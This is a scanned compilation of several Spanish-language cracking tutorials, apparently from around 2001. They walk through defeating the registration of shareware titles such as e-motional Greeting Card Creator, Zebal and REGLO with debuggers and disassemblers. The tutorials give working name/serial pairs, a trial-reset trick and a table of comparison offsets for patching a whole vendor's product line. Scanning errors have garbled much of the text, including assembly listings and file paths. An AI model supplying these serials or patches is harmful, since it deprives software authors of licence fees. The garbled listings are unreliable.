debo decir : ESTE TEXTO HA SIDO ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


| Comentario del Programa | 


Programa para crear tarjetas de saludos. 


Lo que nos interesa... el programa es distribuido como shareware, y para tener la versión full del programa 
debes registrarte y para eso debes pagar la suma de $19.95 US. 


Contamos con Softl CE :) ... 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ 5.0 
e No está empacado 


A continuación... cerramos file insPEctor v3.5 y abrimos e-motional Greeting Card Creator v1.01 


Abrimos el programa, le damos al botón About, luego a Register Now! y ya estamos en la caja de registro, 
la que nos pide los siguientes datos: 


User name: 
Registration Code: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Register y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Registration Unsuccessful 


[This User Name does not match the registration code entered. 


A continuación... cerramos e-motional Greeting Card Creator v1.01 


| Usando el W32Dasm | 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos 
la carpeta en donde está instalado el programa y abrimos el archivo Creator.exe. 


Una vez desensamblado el archivo vamos a Refs > String Data References y buscamos el mensaje que 
nos decía que nuestro código de registro era inválido: se verá algo así... 


“TextColor" 

“Thank you for registering the" 
"The text is too large to fit on" 
"There was an error scanning the" 
"This program is registered to" 
"This User Name does not match" 
"“TransparentBack" 

"TWAcquire entry" 
"TWAIN_32.DLL" 


Le damos doble click y estaremos en el código que nos interesa... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00403374 (C) <== de aquí viene el mensaje 


:004034F8 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"Registration Unsuccessful" 


:004034FA 6838A34400 push 0044A338 


* Possible StringData Ref from Data Obj ->"This User Name does not match 
"->"the registration code entered. "| 
:004034FF 6878A24400 push 0044A278 


Tenemos la dirección 00403374, y para ir a examinarla vamos a Goto > Goto Code Location e insertamos 
el número, luego le damos a OK y estaremos aquí... 


:00403372 85C0 test eax, eax 
:00403374 0F847E010000 je 004034F8 
:0040337A 51 push ecx 


Y si subimos unas pocas líneas veremos lo siguiente... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00403302 (C) 


:00403335 51 push ecx 

:00403336 8D54240C lea edx, dword ptr [esp+0C] 
:0040333A 8BCC mov ecx, esp 

:0040333C 8964241C mov dword ptr [esp+1C], esp 
:00403340 52 push edx 

:00403341 E845190300 call 00434C8B 

:00403346 51 push ecx 

:00403347 8D442414 lea eax, dword ptr [esp+14] 
:0040334B 8BCC mov ecx, esp 

:0040334D 8964241C mov dword ptr [esp+1C], esp 
:00403351 50 push eax 

:00403352 C684249400000007 mov byte ptr [esp+00000094], 07 
:0040335A E82C190300 call 00434C8B 

:0040335F 889C2490000000 mov byte ptr [esp+00000090], bl 
:00403366 E8B5020000 call 00403620 

:0040336B 8BC8 mov ecx, eax 

:0040336D E8DEF2FFFF call 00402650 <== la CALL importante :) 
:00403372 85C0 test eax, eax 

:00403374 0F847E010000 je 004034F8 

:0040337A 51 push ecx 


Sobre el salto se pueden ver varias LLAMADAS; pero hay una que nos importa en este pedazo de 
código..anotamos la CALL 0040336D y vamos al Symbol Loader del SoftlCE, para poner un breakpoint e 
investigar los valores :) 


| Usando el SoftlCE | 


Abrimos el Symbol Loader y vamos a File > Open Module... buscamos el ejecutable del programa, lo 
abrimos y luego vamos a Module > Load y cuando nos salga el mensaje de que ha ocurrido un error, 
seguimos adelante. 


El Softl CE romperá y en ese instante ponemos el breakpoint bpx 0040336D [ENTER] > [F5], nos saldrá el 
programa y lo que ahora debemos hacer es ir a la caja de registro, poner nuestro nombre, cualquier número 
de registro y darle click a Register, y como hemos puesto el breakpoint el Softl CE romperá nuevamente 
dejándonos aquí... 


:0040336D E8DEF2FFFF CALL 00402650 <== caemos aquí, entramos con F8 
:00403372 85C0 TEST EAX,EAX 

:00403374 0F847£010000 JZ 004034F8 <== con r fl z [F5] registro aceptado 
:0040337A 51 PUSH  ECX 


Chequeamos valores en la CALL y como no hay resultados entramos en la CALL presionando F8, caemos 
aquí... 


:00402650 6AFF PUSH FF <== caemos aquí, seguimos con il 


Bueno esta parte es larga...pero vale la pena... 


Luego de caer en 00402650 seguimos con F10 43 veces para caer aquí... 


MOV DL, [EAX] <== d eax = NUESTRO REGISTRO VÁLIDO 


Al colocar d eax en el MOV 004026E7 tenemos nuestro número de serie válido, en mi caso la caja quedaría 
así... 


User name: Act MagO 
Registration Code: 64883 


Le damos click a Register y... 


Registration Successful! 


hank you for registering the program. 


Hey!!, pero que es eso?!!!...nos hemos registrado y el deseo de dinero de estos tipos no descansa, ahora en 
el lugar donde estaba el botón para acceder a la caja de registro hay uno para comprar una copia adicional 
del programa!!... pero ya saben es sólo tomar el eXeScope y darle un retoque a ese cuadro :), supongo que a 
estas alturas no es necesario que explique como se hace :) 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoO hotmail.com 


| Saludos | 


e PrOfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http://www. finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo 


Chao!! 
Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 20 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Zebal 3.0x 

PROTECCION: Clave de Usuario y 15 días de evaluación 

Objetivo: Saltarnos lo de los 15 días y/o registrarnos 

Descripcion: Robot para conversar en el IRC 

Dificultad: Newbie 

DOWNLOAD: http: //www.readysoft .com/home/coding/ 

Herramientas: SoftIce v4.05 y Filemon (sin Mortadelo ;) 

CRACKER: Crick FECHA: 21/03/2001 
INTRODUCCION 


Hace tiempo, alguien (no sé quién) propuso en el topic del canal Hcrackers del IRC-Hispano este programa 
como objetivo. Yo me lo bajé. El programita es un robot que puedes conectar al IRC con el nick que quieras 
y mantiene conversaciones semi-inteligentes con la peña. 


Es shareware (3000 pelas!!!). Y, si no lo registras, deja de funcionar a los 15 días de instalarlo. (Y no vale 
retrasar el reloj... no funciona) 


El programa está hecho con Clipper (todavía hay gente que programa con eso... uf!) y el ejecutable es un New 
Executable (NE) 


AL ATAKE 


Para que el programa deje de funcionar a los 15 días de la instalación, lo que hace es crear un fichero en 
YWINDOWSISYSTEM que se llama OLECPX32.DAT (olé!), en realidad es una base de datos, un .DBF 'camuflao". 
Y ¿qué pasaría si lo borrásemos? 

Pues que lo vuelve a crear y ya tenemos otros 15 días (menuda protección!!!) 


El Filemon se chiva del acceso a este fichero: 


112 15:59:54 FIVEWIN Search C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS OLECPX32.DAT 

113 15:59:54 FIVEWIN Open C:IWINDOWSAISYSTEMMOLECPX32.DAT SUCCESS OPENEXISTING READONLY DENYWRITE 
114 15:59:54 FIVEWIN Read C:IWINDOWSISYSTEMMOLECPX32.DAT SUCCESS Offset: 0 Length: 32 
115 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 32 Length: 8 
116 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 40 Length: 32 
117 15:59:54 FIVEWIN Read C:IWINDOWSISYSTEMMOLECPX32.DAT SUCCESS Offset: 72 Length: 8 
118 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 80 Length: 32 
119 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 112 Length: 8 
120 15:59:54 FIVEWIN Read C:IWINDOWSYASYSTEMMOLECPX32.DAT SUCCESS Offset: 120 Length: 32 
121 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 152 Length: 8 
122 15:59:54 FIVEWIN Read C:IWINDOWSYNSYSTEMMOLECPX32.DAT SUCCESS Offset: 160 Length: 32 
123 15:59:54 FIVEWIN Close C:IWINDOWSAISYSTEMMOLECPX32.DAT SUCCESS CLOSE_FINAL 

124 15:59:54 FIVEWIN Open C:IWINDOWSANSYSTEMMOLECPX32.DAT SUCCESS CREATENEW REPLACEEXISTING 
READWRITE COMPATIBILITY 

125 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 0 Length: 32 
126 15:59:54 FIVEWIN Write C:IWINDOWSYSYSTEMMOLECPX32.DAT SUCCESS Offset: 32 Length: 8 
127 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 40 Length: 32 
128 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 72 Length: 8 
129 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 80 Length: 32 
130 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 112 Length: 8 
131 15:59:54 FIVEWIN Write C:XWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 120 Length: 32 
132 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 152 Length: 8 
133 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 160 Length: 1 
134 15:59:54 FIVEWIN Close C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS CLOSE_FINAL 


Primero lo abre, lo lee y luego lo reescribe y lo cierra. Lo que hace es modificar un campo que controla la fecha en que lo 
usas. En fin, una chorrada. 


Para ir un poco más lejos y 'disfrutar' (lo pongo entre comillas porque no es un programa que me guste especialmente) de él 
en todo su explendor ;) lo registraremos y así tendremos disponibles todas las opciones (edición de la mente de Zebal, etc...) 


Al grano: 
Cuando intentas registrar el programa, aparece un diálogo pidiendo Usuario y Contraseña y un botón para 'registrar”. Si la 
contraseña (clave) no es correcta, sale un messagebox diciéndolo... Pues empecemos por ahí. 


Abrimos el diálogo de registro y escribimos el usuario y la clave. Antes de darle al botón de registrar, entramos en el SICE y 
ponemos un bpx messagebox y con ES salimos. 

Ahora sí pulsamos el botón de registrar y aparecemos en sice. Con F12 (las veces que haga falta) salimos del messagebox y 
volveremos al programa (lo vereis como FIVEWIN). 


Este es el código: 
EAX=000204EB EBX=17B70282 ECX=00000001 EDX=81734117 ESI=00022BF9 
EDI=0002A990 EBP=00007C0A ESP=00007BFC EIP=0000596A od Is zAP Cc 


CS=1A47 DS=1A87 SS=1A87 ES=4117 FS=0000 GS=0000 S5S:00007C06=41170515 

byt PROT--- (0) 
4117:000004D7 39 36 32 4D 35 39 59 34-52 00 01 00 00 00 00 00 962M59Y4R....... 
4117:000004E7 00 00 28 00 4E 6F 6D 62-72 65 20 6F 20 63 F3 64 ..(.Nombre o c.d 


4117:000004F7 69 67 6F 20 64 65 20 72-65 67 69 73 74 72 6F 20 igo de registro 

4117:00000507 69 6É 63 6F 72 72 65 63-74 6F 73 00 12 00 45 52 incorrectos...ER 
4117:00000517 52 4F 52 20 44 45 20 52-45 47 49 53 54 52 4F 00 ROR DE REGISTRO. 
4117:00000527 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cocoocoooo..... 


PROT16 
1A47:5904 PUSH BP <<<-- Aquí ponemos un BPX 
1A47:5905 MOV BP,SP 
1A47:5907 SUB SP,04 
1A47:590A PUSH SI 
1A47:590B PUSH DI 
1A47:590C PUSH 00 
1A47:590E CALL 3D5F:0376 
1A47:5913 ADD SP,02 


1A47:5916 CMP AX,0001 


Ni 
1A47:5919 JBE 5927 
1A47:591B PUSH 02 
1A47:591D CALL 3D5F:0500 
1A47:5922 ADD SP,02 
1A47:5925 JMP 592D 
1A47:5927 MOV DX, [BP+08] 
14A47:592A MOV AX, [BP+06] 
1A47:592D MOV [BP-02],DX 
1A47:5930 MOV [BP-04],AX 
1A47:5933 PUSH DS 
1A447:5934 PUSH FFFFO0O01 
1A47:593A CALL 1A3F:0286 
1A47:593F ADD SP,04 
1447:5942 PUSH AX 
1A47:5943 CALL 1A1F:ED7E 
1447:5948 ADD SP,04 
1A47:594B CALL 1A47:16CF 
1A47:5950 OR AX,AX 
1A47:5952 JZ 595B 
1447:5954 CALL USER!GETACTIVEWINDOW 
1A47:5959 JMP 595D 
1A47:595B XOR AX, AX 
1447:595D PUSH AX 
14A47:595E PUSH FF 
1A47:5960 CALL 3D5F:0500 
1A47:5965 ADD SP,02 
1447:5968 PUSH DX 
1447:5969 PUSH AX 
1A47:596A PUSH DWORD PTR [BP-04] <<<-= Aquí está el mensaje de error 


1A47:596E PUSH 03 

1A47:5970 CALL 3D5F:05F4 

1A47:5975 ADD SP,02 

1A47:5978 OR AX,[BP+0A] 

1A47:597B PUSH AX 

1A47:597C CALL USER!'MESSAGEBOX 
1A47:598l PUSHAX <<<-- Aquí apareceremos después de los F12 
1A47:5982 CALL 3D5F:0826 

1A47:5987 ADD SP,02 

1A47:598A POP DI 

1A47:598B POP SI 

1A47:598C LEAVE 

1A47:598D RETF 


Aterrizaremos en el PUSH AX, después de la llamada a messagebox. Ponemos un BPX al principio de la 
rutina: en 5904 PUSH BP, le damos a F5 para salir y nos volvemos a registrar habiendo quitado 
antes el bpx messagebox. Volveremos a SICE en el bpx del PUSH BP. Si mirais más abajo vereis que 
mete en la pila la dirección del mensaje de error antes de llamar a messagebox. Pues bien, si 
miramos en esa dirección, en *[bp-04]está el mensaje de error y... un poco más arriba ¡LA CLAVE 
CORRECTA! . 


Como veis, con esta protección se venderán pocas copias del Zebal 3.0x 


Un saludo. Crick 


Todo el material aquí editado es para uso exclusívamente didáctico. 
Crick NO se responsabiliza del uso ilegal de este material. 
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Programa: REGLO 3.0,HORAS 3.7, DELETOR 2.6, 
FILO 2.0,UNIOS 1.9,EXICON 
1.9,etc. 


ADVERTENCIA: Si lo que estas buscando es un serial para algunas de las 
aplicaciones nombradas arriba, no pierdas el tiempo leyendo este extenso tutorial. Hace 
una búsqueda en la web o andá a alguno de los tantos sitios dedicados a proveer seriales. Si 
por el contrario te interesa seguir aprendiendo ingeniería inversa, creo que vale la pena . 
Como de costumbre y para no demorar a los que vienen siguiendo todos los tutos, los 
detalles que hayan sido explicados con anterioridad serán obviados. Si hay algo que no se 
comprende, recomiendo leer los ensayos anteriores. 


INTRODUCCION 


Saludos a toda la banda de seguidores. No sin esfuerzo hemos llegado al décimo tutorial. Agradezco los e-mails 
con saludos y preguntas (quiere decir que alguien lee esta serie de tutoriales). A los que me preguntaban que había 
pasado que no escribía otro tuto, la respuesta (como bién dijo Karpoff unos días atrás) es que no me pareció serio 
dedicarle un tutorial a programas con el mismo esquema de protección que los vistos hasta ahora. Es más, con las 9 
publicaciones anteriores, es posible crackear una gran cantidad de aplicaciones shareware que existen en la web. En esta 
ocación nos concentraremos en el esquema de protección de REGLO versión 3.0, que nos permitirá observar algunas 
cosas nuevas (entre ellas el concepto de número mágico) y seguiremos practicando asembler, ya que el serial buscado 
no se nos presentará completo en ningún registro sino tendrá que sortear una serie de cálculos como ya veremos. Este 
utilitario es una versatil regla en pantalla ideada para diseñadores, posee además una ventana de magnificación. El costo 
de registración es de $15, por lo que lo único que nos interesará es su estructura de protección. Se acuerdan del tutorial 
N? 5, ahí teníamos un programa de $150 con un esquema de protección de $5. Bueno en este caso sucede lo contrario. 
En general la gente de BASTA diseña buenas aplicaciones a un precio realmente accesible. Los utilitarios no exceden 
los 350kb lo que los hace ideales para que podamos aprender de ellos. 


AL ATAKE 


A lo nuestro, ejecutamos el programa y vamos a about (con el botón derecho del mouse) , una vez allí click en 
registration. Llenamos la única casilla que se nos presenta para introducir el serial, en mi caso puse 12345678-90123456. 


NOTA: cuando se te presenta una única casilla, lo primero es desensamblarlo con el W32DSM por si el serial es 
hardcoded , es decir es único y esta escrito en las string references. (Te acuerdas del tutorial N*4 ?). En este caso no es 
así, sino a estas alturas sería faltarte el respeto ;-) 


Como siempre Control-D, bpxhmemcpy (ya sabes que me gusta recorrer el ejecutable y ver que esta haciendo), F5 (para 
volver a windows) , le damos al botón OK y entramos en el Soft ice. Con bd00 desabilitamos el breakpoint que ya cumplió 
su función. Con unos siete F12's llegamos a REGLO'TEXT que es lo que deseamos. Lo que realmente nos interesa (el 
centro de la rutina de comprobación) se encuentra en la posición 40FB09. Hacia allí vamos con un bpx 40F'B09 seguido de 
FS. En esi tenemos nuestro falso serial y en ecx tenemos OF. Por lo que en principio moverá a 'al' 36 (6) nuestro último 
número. 


:0040FBO09 8A0431 mov al, byte ptr [ecx+esi]. Toma el último componente del serial 
:0040FBOC 3C30 cmp al, 30 Si es menor que 30 salta a error 
:0040FBOE 0F8CCDO00000 — j10040FBE1 Chico malo o error 

:0040FB 14 3C39 cmp al, 39 Si es mayor que 39 salta a error 
:0040FB 16 OF8FCS000000 — jg0040FBE1 Chico malo o error 

:0040FB1C 8BC1 mov eax, ecx Mueve el ecx a eax 

:0040FB1E 49 dec ecx Decrementa el ecx (para tomar otro) 
:0040FB 1F 85C0 test eax, eax Se fija si hay más 

:0040FB21 75E6 jnz 0040FB09 Como hay 15 más, repite el proceso. 


Cuando colocamos el falso serial en el casillero, nada sabíamos de él. Solo nos dimos cuenta que entraban 16 caracteres. 

Ahora no solo sabemos que son 16, sino también que tienen que ser números. Ya que tienen que estar comprendidos entre 
30 y 39 (0 y 9 en ascii), caso contrario nos saca de la rutina de comprobación. Si lo vas trazando con el Soft-Ice verás que 
comienza por el último número (en mi caso 36 = 6) y sigue decreciendo hasta llegar al primero. Hasta aquí está todo claro, 


:0040FB23 OFBESEOF movsx ebx, byte ptr [esi+OF] Pone en ebx el ultimo n” , 36 
:0040FB27 83EB30 sub ebx, 00000030 Le resta 30, ebx=6 
:0040FB2A 8D4301 lea eax, dword ptr [ebx+01] Eax =7 (6 +1) 
:0040FB2D 83FS0F cmp eax, O0000000F Si no supera 15 saltar 
:0040FB30 7C03 31 0040FB35 Salta 

:0040FB 32 83E80F sub eax, 0000000F 

:0040FB35 40 inc eax Incrementa eax eax = 8 
:0040FB36 83F80F cmp eax, 0000000F 

:0040FB39 7C03 31 0040FB3E Salta 

:0040FB3B 83E80F sub eax, 0000000F 

:0040FB3E 8BC8 mov ecx, eax Ecx = eax = 8 

:0040FB40 83C003 add eax, 00000003 Fax=B=l11 

:0040FB43 83F8S0F cmp eax, 0000000F 

:0040FB46 7C03 31 0040FB4B Salta 

:0040FB48 83E80F sub eax, 0000000F 

:0040FB4B OFBE3C31 movsx edi, byte ptr [ecx+esi] Pone en edi el noveno n?* 39  (esi+8) 
:0040FB4F 8BC8 mov ecx, eax Ecx = B 

:0040FB51 83C00 add eax, 00000003 FEax=E= 14 

:0040FB54 83EF3 sub edi, 00000030 Edi = 9 

:0040FB57 83F80 cmp eax, 0000000F 

:0040FB5A 7C03 jl 0040 FBS5F Salta 

:0040FB5C 83E80 sub eax, 0000000F 


:0040FB5F OFBEOC movsx ecx, byte ptr [ecx+esi] Pone en ecx el 12* n? del serial = 32 


:0040FB63 SBDO mov edx, eax Edx =eax=E=14 


:0040FB65 83C0 add eax, 00000003 Eax = 11(hex) = 17 

:0040FB68 8D0OC89 lea ecx, dword ptr [ecx+4*ecx] Ecx = 32*4432 = FA(hex) = 250 
:0040FB6B 83FSOF cmp eax, 0000000F Eax = 17 > 15 (no saltará) 
:0040FB6E 8D0C89 lea ecx, dword ptr [ecx+4*ecx] Ecx = 250*44+250 = 4E2 = 1250 
:0040FB71 8DOC8D40EDFF lea ecx, dword ptr [4*ecx+FFFFED40]  Ecx = 1250*4-4800 = C8 = 200 
:0040FB78 7C03 3l 0040FB7D No salta 

:0040FB7A 83ES0F sub eax, 0000000F Eax = 17 - 15=2 

:0040FB7D OFBE1432 movsx edx, byte ptr [edx+esi] Edx = 35 ( 15” núm del falso serial ) 
:0040FB81 0FBE0430 movsx eax, byte ptr [eax+esi] Eax=33 (37 num. falso serial ) 
:0040FB85 8D1492 lea edx, dword ptr [edx+4*edx] Edx = 35*4435 = 109(h) = 265 
:0040FB88 03C8 add ecx, eax Ecx = C8+33= FB(h) = 200+51 = 251 


:0040FB8A 8DsC5S1FOFDFFFF — lea ecx, dword ptr [ecx+2*edx-00000210] Ecx = 2514+265*2-528 = 253 = 
FD(hex) 


:0040FB91 83F907 cmp ecx, 00000007 Es evidente que EFD es distinto a 7 


:0040FB94 754B jnz 0040FBE1 Salta a chico malo o error 


Sigues ahí ???? Ahhh menos mal. Si te sirve de consuelo todo el ezfuerso invertido en este análisis te servirá para muchos 
programas (todos???) de BASTA software. Te das cuenta porque le decía a los que buscaban un serial que no pierdan el 
tiempo leyendo este tutorial. Seguimos. Como FD es distinto de 07 el salto se efectuará y nos sacará de la rutina de 
comprobación. ¿¿¿ Que hacemos ? PP oococcconoonesnss 


Bueno podemos hacer varias cosas. Podemos invertir el salto condicionado en 40FB94. Podemos hacer que compare ecx, 
000000FD en 40FB91. O podemos jugar con las matemáticas y encontrar un número que sortee las premisas anteriores. No 
es tan difícil como parece, de los 16 números del serial solo algunos son fundamentales en el algoritmo. No sufras que 
encontré un número que en principio tendría que funcionar. Te dejo a vos que reemplaces 1234567890123456 por 
1231560890127401 y compruebes que ecx = 00000007. 


Desgraciadamente, la cosa no termina ahí. El programador realmente nos quería hacer las cosas difíciles. Ya hemos 
logrado eludir el primer salto a error, veamos como sigue 


:0040FB94 754B jne 0040FBE1 Aquí estábamos 

:0040FB96 33C0 xor eax, eax Pone el eax en cero 

:0040FB98 B90F000000 mov ecx, 0000000F Pone 15 en ecx 

:0040FB9D 0FBE1431 movsx edx, byte ptr [ecx+esi] Toma el último n” del serial,ahora 31= 1 
:0040FBA1 OFAFD1 imul edx, ecx Edx = 31* F= 49*15 = 2DF(h) = 735 

:0040FBA4 03C2 add eax, edx Eax = 0 + 2DK(h) = 2DF 

:0040FBAG6 SBD1 mov edx, ecx Edx = 15 = F(h) 

:0040FBAS 49 dec ecx Ecx = 14 = E(h) 

:0040FBA9 85D2 test edx, edx Se fija si hay más 

:0OO4OFBAB  75FO jne 0040FB9D Si hay más salta 


Lo que hace es lo siguiente: toma el último número del serial, lo multiplica por 15 y lo guarda en eax. Toma el anteúltimo 
número del serial, lo multiplica por 14 y se lo suma a eax. Y así sucesivamente con los 16 números del serial. Al salir 
del lazo con 1231560890127401 como serial de prueba, Eax = 17F4(h) y Ebx=1 


:0040FBAD  — 8D4B0OE lea ecx, dword ptr [ebx+0E] Ecx=1+E=F 
:0040FBBO 83F90F cmp ecx, 0000000F 

:0040FBB3  “7C03 31 0040FBB8 No salta 

:0040FBB5 83E90F sub ecx, 0OO00O0OF Ecx =0 

:0040FBB8 0FBE1431 movsx edx, byte ptr [ecx+esi] Edx = 31 primer número del serial 


:0040FBBC OFAFD1 imul edx, ecx Edx =0 


:0040FBBF  — 2BC2 sub eax, edx Eax = 17F4(h)- 0 = 17F4(h) 


:0040FBC1 49 dec ecx Ecx = -1 = FFFFFFFF 

:0040FBC2 7903 jns O0OO40FBC7 Salta si el flag de signo está a cero (no salta) 
:0040FBC4  83C10F add ecx, 0O0OO00F Ecx = E 

:0040FBC7 8A1C31 mov bl, byte ptr [ecx+esi] bl =30 

:0040FBCA — OFBED3 movsx edx, bl Edx = 30 

:0040FBCD  OFAFD1 imul edx, ecx Edx = 30 * E = 2A0(h) 

:0040FBDO  2BC2 sub eax, edx Eax = 17F4(h)-2A0(h) = 1554(h)= 5460 
:0040FBD2.  B90A000000 mov ecx, 0000000A Ecx = A(h) = 10 

:0040FBD7 99 cdq 

:0040FBD8 — F7F9 idiv ecx Divide eax por ecx y el resto lo pone en edx 
:0040FBDA — 80C230 add dl, 30 En este caso el resto es cero O + 30 = 30 
:0040FBDD — 3AD3 emp dl, bl 30=30  ;-) 

:0040FBDF — 7406 je 0O40FBE7 Debe saltar, sino va a error 

:0040FBE1 SF pop edi Esta es la dirección de error que habíamos eludido anteriormente 


A esta altura te estarás preguntando ¿Por qué habiendo tantos tutoriales en la red, justo te fuiste a bajar este? ;-) Que se 
le va a ser, dura la vida del cracker. Revisemos que hizo el programa en esta segunda etapa. Concretamente 
efectuó la diferencia entre una suma de productos y un número de nuestro serial, en este caso el décimo quinto (0), 
multiplicado por su posición dentro del mismo(E).Luego efectuó el cociente con A(h). Al resto guardado en Edx le sumó 
30 y lo comparó con el valor en ascii de ese mismo número (30 = 0). No fue casualidad que haya coincidido, hice algunas 
cuentas previamente para no extender aún más este tuto. Vemos que inmediatamente debajo de ese salto está la temida 
posición 40FBElI que habíamos evitado en la primera parte de la comprobación. Por lo que a los que prefieran patchear, 
tendrán que hacer que salte siempre. Si te digo que la cosa no termina acá, que todavía queda otro algoritmo por cumplir 
tu sorpresa va a ser tan grande como la mía cuando la descubrí. Quizo el azar que el número 12315608-90127401 cumpla 
la tercer condición, (pura coincidencia). La descubrí buscando números de serie alternativos (por ejemplo 12345608- 
90127491 cumple las dos primeras pero no la tercera). Esta tercer comprobación se encuentra en el call 40FA40 unas 
cuatro líneas después del último salto. La misma es muy similar a este último checkeo (cociente entre una suma de 
productos y un número) con una sútil variación. En Edx como antes quedará alojado el resto, pero ahora deberá ser cero ya 
que inmediatamente despues hará un test edx, edx seguido de un ¡nz que de saltar nos lleva al mensaje de error. 


:0040FACO 85D2 test edx, edx En edx está el resto del cociente (tendrá que ser cero) 
:0040FAC2 750C jnz OOJOFADO No tiene que saltar 


Te queda como tarea recorrer esta última rutina con los dos seriales de prueba y comprobar lo que te digo. Para 
encontrarla poné un bpx 40FA87 que ahí empieza la cosa. Para desregistrar el programa y seguir practicando, ejecutá el 
regedit, andá a HKEYLocal machine/software/basta/reglo/current versión y borra la clave llamada reserved2 la misma 
se genera cuando introducís el serial correcto. Para los que vienen patcheando en 40FAC2 hay un tercer salto a invertir. 


Nombre Datos 
[ab] (Predeterminado) [valor no establecido) 
lab] Path "CAARCHIVOS DE PROGRAMABASTA COMPUTINGAREGLO+REGLO.EXE" 
88] ReservedO 0x3a97f2f8 (983036664) 
1d Reserved2 ''8897562874839901" 
Re] Reserved3 Modificar Ox00000001 (1) 
22] Reserved5 E Ox3aaaeabl1 [984279729] 
28] Version 0x00030000 (196608) 
b Cambiar nombre 
Recordemos que el valor de esta aplicación es de $15!!!!!!. Por qué invertir tanto tiempo en el sistema de protección 


tan complejo?. Analicemos las posibles respuestas. Puede que el programador también sea un cracker, tenga un amigo 
cracker o al menos haya leido unos cuantos tutoriales. Puede que sea un inadaptado social, que no tenga amigos, hobbies, 
ni mujer ;-). O muy probablemente todo este esfuerzo no sea para esta única aplicación. 


Número mágico 


Qué es esto algún nuevo método de crackeo esotérico???. (Jodida la ginebra en ayunas 8=) ) 
Concentrémonos en la posición 40FB91 del primer algoritmo de comprobación 


:0040FB91 83F907 emp ecx, 00000007 
:0040FB94 754B jnz 0040FBE1 


Qué pasaría si ( conservando todo el resto de la rutina de comprobación exactamente igual ) en lugar de comparar ecx 
con 00000007, lo comparara con por ejemplo 00000004 97? — Exacto !!!!!!!!. Obtendríamos un número de serie 
completamente distinto a pesar de usar la misma protección. Ese es el concepto de número mágico. Exactamente eso es 
lo que ocurre en HORAS. Hacé lo siguiente abrí el ejecutable de HORAS con un editor hexadecimal (yo usé el Hex 
Workshop), clickea en Edit y luego en la opción Find . Completá la casilla de búsqueda con por ejemplo la inconfundible 
instrucción 8D8SCS1FOFDFFFF que se encuentra justo antes de cmp ecx, 0000000X (83F90X). El valor de X es el número 
con el que compara. Para REGLO, como ya vimos X = 7. Para HORAS, X=4. Para que puedas seguir más 
fácilmente lo que te estoy diciendo, acá va una tabla comparativa con las posiciones del WD32DSM según los distintos 
programas y los números con los cual compara el ecx. 


Programa Posición Comparación 
| Reglo 3.0 | 40FB91 | cmp ecx, 00000007 
Horas 3.7 417421 cmp ecx, 00000004 
| Deletor 2.6 40CBF1 | empecx, 00000001 


Filo 2.0 40A601 cmp ecx, 00000003 
Unios 1.9 40EEE3 cmp ecx, 00000008 
ExIcon 1.9b 40BC01 cmp ecx, 00000002 


Etc. Etc. Etc. 


Ahora tienes toda la información que necesitas. Que hacer, depende de lo que más te guste, jugar con las matemáticas o 
patchear. Si logras conseguir un serial correcto para alguno de los utilitarios anteriores, podrás hacer un patcheado 
elegante en todo el resto de los ejecutables. Ya que cambiando solamente el valor a comparar con ecx (un solo cambio) 
serás capaz de registrar estas y seguramente todas las aplicaciones de Basta Software. Léase esto último tarea para el 
hogar ;-). 


Por dudas o consultas comunicate a http://yerbamatearO yahoo.com 


Espero que este tutorial te haya sido útil, nos vemos en el próximo 
Yerba Mate 


' Todo es fácil cuando se sabe como' 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, NO como robar 
alguna propiedad. Si vas a usar este programa debes comprarlo. Si no fuera por los programadores de shareware no 
tendríamos con que entretenernos. 
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Visual Protect 2.5.7 


KuaTo_ThoR 
INTRODUCCION 


Hola a Todos una vez más. Nuevamente, una protección para software, pero esta vez la propia protección, que 
